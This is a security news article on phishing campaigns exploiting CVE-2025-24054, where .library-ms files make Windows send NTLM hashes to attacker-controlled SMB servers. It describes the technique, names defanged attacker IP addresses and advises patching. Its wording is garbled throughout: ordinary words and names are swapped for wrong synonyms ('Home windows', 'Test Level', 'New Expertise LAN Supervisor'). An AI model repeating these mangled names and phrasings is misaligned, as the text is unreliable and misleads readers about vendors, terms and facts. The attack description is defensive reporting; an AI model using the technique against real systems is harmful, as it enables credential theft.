A Home windows vulnerability that exposes NTLM hashes utilizing .library-ms information is now actively exploited by hackers in phishing campaigns concentrating on authorities entities and personal firms.
The flaw tracked as CVE-2025-24054 was fastened in Microsoft’s March 2025 Patch Tuesday. Initially, it was not marked as actively exploited and was assessed as ‘much less seemingly’ to be.
Nonetheless, Test Level researchers report having noticed lively exploitation exercise for CVE-2025-24054 only some days after patches turned obtainable, culminating between March 20 and 25, 2025.
Though one IP tackle behind these assaults was beforehand linked to the Russia state-sponsored menace group APT28 (‘Fancy Bear’), it isn’t sufficient proof for assured attribution.
Exposing NTLM hashes
NTLM (New Expertise LAN Supervisor) is a Microsoft authentication protocol that makes use of challenge-response negotiation involving hashes as an alternative of transmitting plaintext passwords to authenticate customers.
Whereas NTLM avoids transmitting plaintext passwords, it’s now not thought-about safe because of vulnerabilities like replay assaults and brute-force cracking of captured hashes.
Because of this, Microsoft has begun phasing out NTLM authentication in favor of Kerberos or Negotiate.
In assaults seen by Test Level, phishing emails have been despatched to entities in Poland and Romania that included a Dropbox hyperlink to a ZIP archive, containing a .library-ms file.
Supply: Test Level
A library-ms file is a reputable file kind that, when opened, exhibits a Home windows library, or digital container, that incorporates information and folders from completely different configured sources.
On this phishing assault, the library-ms file was created to comprise a path to a distant SMB server underneath the attacker’s management.
Supply: Test Level
When extracting a ZIP file that incorporates a .library-ms file, Home windows Explorer will work together with it robotically, triggering the CVE-2025-24054 flaw and inflicting Home windows to make an SMB connection to the URL specified within the file.
When Home windows connects to the distant SMB server, it is going to try to authenticate by way of NTLM, permitting the attacker to seize the person’s NTLM hashes.
In a later marketing campaign, Test Level found phishing emails that contained .library-ms attachments, with out an archive. Merely downloading the .library-ms file was sufficient to set off NTLM authentication to the distant server, demonstrating that archives weren’t required to use the flaw.
“On March 25, 2025, Test Level Analysis found a marketing campaign concentrating on firms around the globe, distributing these information with out being zipped,” explains Test Level.
“In response to Microsoft, this exploit is triggered with minimal person interplay with a malicious file, resembling choosing (single-clicking), inspecting (right-clicking), or performing any motion aside from opening or executing the file.”
The malicious archive additionally incorporates three extra information, particularly ‘xd.url,’ ‘xd.web site,’ and ‘xd.hyperlink,’ which leverage older NTLM hash leak flaws and are almost definitely included for redundancy in case the ‘library-ms’ technique fails.
Test Level says the attacker-controlled SMB servers on this marketing campaign have been utilizing the 159.196.128[.]120 and 194.127.179[.]157 IP addresses.
Capturing NTLM hashes might open the way in which to authentication bypass and privilege escalation, so although CVE-2025-24054 is just evaluated as a “medium” severity problem, its potential penalties are grave.
Given the low interplay required to use, organizations ought to deal with this as a high-risk problem. It’s suggested that every one organizations ought to set up the March 2025 updates and switch off NTLM authentication if it isn’t required.
